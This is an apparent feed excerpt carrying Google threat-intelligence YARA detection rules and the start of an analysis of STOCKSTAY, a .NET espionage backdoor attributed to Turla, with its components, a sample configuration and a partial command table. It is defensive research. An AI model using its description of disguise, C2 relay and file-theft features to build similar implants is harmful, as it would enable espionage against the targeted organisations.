    $days_not_work_2 = "\"dnw\""
    $system_properties_1 = "\"system_properties\""
    $system_properties_2 = "\"sp\""

  condition:
    any of ($internal_id*)
    and any of ($internal_key*)
    and any of ($interval_engine*)
    and any of ($level_info*)
    and any of ($time_scale*)
    and any of ($span_min*)
    and any of ($span_max*)
    and any of ($rate*)
    and any of ($service*)
    and any of ($days_not_work*)
    and any of ($system_properties*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects code for parsing crypto containers within STOCKSTAY components."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $s1 = "BuildCryptoContainer"
        $s2 = "ParseCryptoContainer"
        $s3 = "Windows-1251" wide
        $s4 = "AesCryptoServiceProvider"
        $s5 = "RSACryptoServiceProvider"

    condition:
        uint16(0) == 0x5a4d
        and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_WindowNames_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY window names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"


    strings:
        $import = "_CorExeMain"
        $s2 = "SMEditorPage" wide
        $s3 = "SMNetPage" wide
        $s4 = "StockMarketViewPage" wide
        $s5 = "window_system32_x128" wide
        $s6 = "window_system32_x64" wide
        $s7 = "window_system32_x32" wide

    condition:
        $import 
        and any of ($s*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Downloader_STOCKSTAY_MARKETMAKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.MARKETMAKER downloader based on method names and payload filenames."
        hash = "da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40"

    strings:
        $f1 = "CheckAutoRun"
        $f2 = "SetupAutoRun"
        $f3 = "DownloadAndExtractZip"
        $f4 = "GetSystemProxy"

        $s0 = "_CorExeMain"
        $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
        $s2 = "StockMarketView.exe" wide
        $s3 = "SMNet.exe" wide
        $s4 = "SMEditor.exe" wide

    condition:
        all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Controller_STOCKSTAY_STOCKMARKET_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKMARKET controller based on method and field names, and SQL queries"
        hash = "2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0"

    strings:
        $f1 = "ProtocolMessageConnect"
        $f2 = "ProtocolMessageEnd"
        $f3 = "ProtocolMessagePing"
        $f4 = "ProtocolMessageRequestRecv"
        $f5 = "ProtocolMessageRequestSend"
        $f6 = "ProtocolMessageTask"
        $f7 = "ProtocolMessageTaskSysinfo"
        $f8 = "TMR_AppInit_Tick"
        $f9 = "TMR_Engine_Tick"
        $f10 = "TMR_KeepAlive_Tick"
        $f11 = "TMR_PingNet_Tick"
        $f12 = "TMR_PingSystem_Tick"
        $f13 = "GetDataTrade"
        $f14 = "GetDataNews"
        $f15 = "InsertDataTrade"
        $f16 = "InsertDataNews"
        $sql1 = "CREATE TABLE IF NOT EXISTS News (" wide
        $sql2 = "CREATE TABLE IF NOT EXISTS Trade (" wide
        $sql3 = "CREATE TABLE IF NOT EXISTS Market (" wide
        $sql4 = "INSERT INTO Market ( Guid, Version, Config, Status, Launch, Type ) VALUES (@Guid, @Version, @Config, @Status, @Launch, @Type)" wide
        $sql5 = "INSERT INTO News (Container) VALUES (@Container)" wide
        $sql6 = "INSERT INTO Trade (Container) VALUES (@Container)" wide

    condition:
        8 of ($f*)
        and any of ($sql*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Tunneler_STOCKSTAY_STOCKBROKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKBROKER tunneler based on known IPC message handler and variable names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"

    strings:
        $s1 = "_CorExeMain"
        $s2 = "ProtocolMessageStatusConnection"
        $s3 = "ProtocolMessageResult"
        $s4 = "ProtocolMessageEnd"
        $s5 = "OnGetDataFromServer"
        $s6 = "webSocket"
        $s7 = "wmCopyData"
        $s8 = "tempStorage"

    condition:
        all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_STOCKTRADER_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKTRADER backdoor based on known command handlers and FNV1a hashes."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $cmd_1 = "AppDel"
        $cmd_3 = "AppDeleteRegistryValue"
        $cmd_4 = "AppDir"
        $cmd_5 = "AppGet"
        $cmd_6 = "AppMkdir"
        $cmd_7 = "AppPut"
        $cmd_8 = "AppReadRegistryValue"
        $cmd_9 = "AppRegistryKeyExists"
        $cmd_10 = "AppRmdir"
        $cmd_11 = "AppRun"
        $cmd_12 = "AppWriteRegistryValue"
        $cmd_13 = "AppUnpackArchive"
        $cmd_14 = "ArchiveFiles"
        $cmd_15 = "GetFiles"
        $cmd_16 = "Sysinfo"
        
        $hash_1  = {ea8e5e34}
        $hash_2  = {3445694e}
        $hash_3  = {f73e97b6}
        $hash_4  = {9aa70c59}
        $hash_5  = {18b496c9}
        $hash_6  = {0f716ebc}
        $hash_7  = {8e2d79ce}
        $hash_8  = {3ae2a963}
        $hash_9  = {35d26840}
        $hash_10 = {6c41d6bc}
        $hash_11 = {1fdbbb2f}
        $hash_12 = {6ae6578d}
        $hash_13 = {66732be7}
        $hash_14 = {0b113b3d}

    condition:
        uint16(0) == 0x5a4d
        and (
            12 of ($cmd*)
            or 10 of ($hash*)
        )
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_1 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext class and method names associated with the .NET class K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $plain_api_1 = "Squirrel3"
    $plain_api_2 = "DecryptArraySimple"
    $plain_api_3 = "DecryptIntSimple"
    $plain_api_4 = "DecryptLongSimple"
    $plain_api_5 = "DecryptFloatSimple"
    $plain_api_6 = "DecryptStringSimple"
    $plain_api_7 = "DecryptDoubleSimple"
    $plain_api_8 = "_squ_ui1"
    $plain_api_9 = "_squ_ui2"
    $plain_api_10 = "_squ_ui3"
    $plain_api_11 = "InjectedSeedCipher"

  condition:
    dotnet.is_dotnet
    and 5 of ($plain_api*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_2 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $squirrel3_code_1 = {
      00 // nop
      03 // ldarg.1
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      02 // ldarg.0
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      62 // shl
      61 // xor
      0A // stloc.0
      06 // ldloc.9
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      0B // stloc.1
      2B 00 // br.s 40
      07 // ldloc.1
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_3 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"

  strings:
    $squirrel3_code_1 = {
      03 // ldarg.1
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      02 // ldarg.0
      58 // add
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      58 // add
      25 // dup
      1E // ldc.i4.8
      62 // shl
      61 // xor
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-25T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/rekordowe-zainteresowanie-narzedziami-ai-umiejetnosci-jutra-ai-az-94-absolwentow-zamierza-korzystac-z-ai-w-pracy</id>
    <title>Rekordowe zainteresowanie narzędziami AI. Umiejętności Jutra: AI: aż 94% absolwentów zamierza korzystać z AI w pracy</title>
    <updated>2026-06-25T14:00:00+00:00</updated>
    <content type="html">Pełna sala absolwentów Umiejętności Jutra AI</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/rekordowe-zainteresowanie-narzedziami-ai-umiejetnosci-jutra-ai-az-94-absolwentow-zamierza-korzystac-z-ai-w-pracy" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-25T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering/</id>
    <title>STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus</title>
    <updated>2026-06-25T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Jordan Jones&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Turla, and specifically their longstanding Snake implant, has been publicly &lt;/span&gt;&lt;a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;attributed&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to &lt;/span&gt;&lt;a href="https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;at least 2004&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The actor remains active and continues to evolve its delivery methods, as demonstrated by its &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;deployment of specialized scripts&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to intercept secure communications from Signal Messenger users, its &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;hijacking of legacy criminal botnets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to target Ukrainian organizations, and its &lt;/span&gt;&lt;a href="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;recent campaigns&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Overview&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source &lt;/span&gt;&lt;a href="https://github.com/sta/websocket-sharp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;websocket-sharp&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of &lt;/span&gt;&lt;a href="https://learn.microsoft.com/en-us/windows/win32/dataxchg/wm-copydata" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WM_COPYDATA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; messages. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Overview of STOCKSTAY malware architecture" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Overview of STOCKSTAY malware architecture&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;net&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET, internally referred to as “&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;cor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;{
  "Name": "StockMarket",
  "Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
  "Theme": "Dark",
  "SystemConfiguration": [
    "1D.AA.79.9F.45.AA.04.B3.&amp;lt;snipped&amp;gt;.68.0A.5D.A3.E6.A3.82.FA",
    "6F.41.4D.6D.C3.20.E5.32.&amp;lt;snipped&amp;gt;.00.B8.26.DF.E1.13.0A.21",
    "4.4.3.12"
  ],
  "Interval": 10,
  "Services": [
    "wss://ws-api.binance.com:443/ws-api/v3",
    "wss://ws-feed.exchange.coinbase.com",
    "wss://ws-feed-public.sandbox.exchange.coinbase.com",
    "wss://stream.bybit.com/v5/public/spot",
    "wss://stream.bybit.com/v5/public/linear"
  ],
  "Version": "2022-12-21"
}&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;{
  "internal_id": "&amp;lt;server_identifier&amp;gt;",
  "internal_key": "&amp;lt;server_public_key&amp;gt;",
  "interval_engine": "600000",
  "level_info": "0",
  "time_scale": "1",
  "span_min": "9",
  "span_max": "18",
  "rate": "2700",
  "rate_control": "false",
  "service": "&amp;lt;websocket_c2_url&amp;gt;",
  "days_not_work": "Saturday;Sunday;",
  "system_properties": "eyJzeXN0ZW1fZGF0YV9zaXplIjoiNDAwMDAwIn0="
}&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 3: Decrypted STOCKSTAY configuration file format (extracted from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;SystemConfiguration&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;“&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;internal_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER, internally referred to as “&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;sys&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="center"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Task Command Name&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Del&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete the specified files.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Dir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Generate a listing of the specified directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Optionally performs recursive directory listing.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Get&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Retrieve one or more specified files. Allows for collection of files with specific extensions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Image&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Perform a screen-capture of the victim’s screen.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The resultant image is base64-encoded for transmission to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MkDir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create one or more directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MultyTask&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
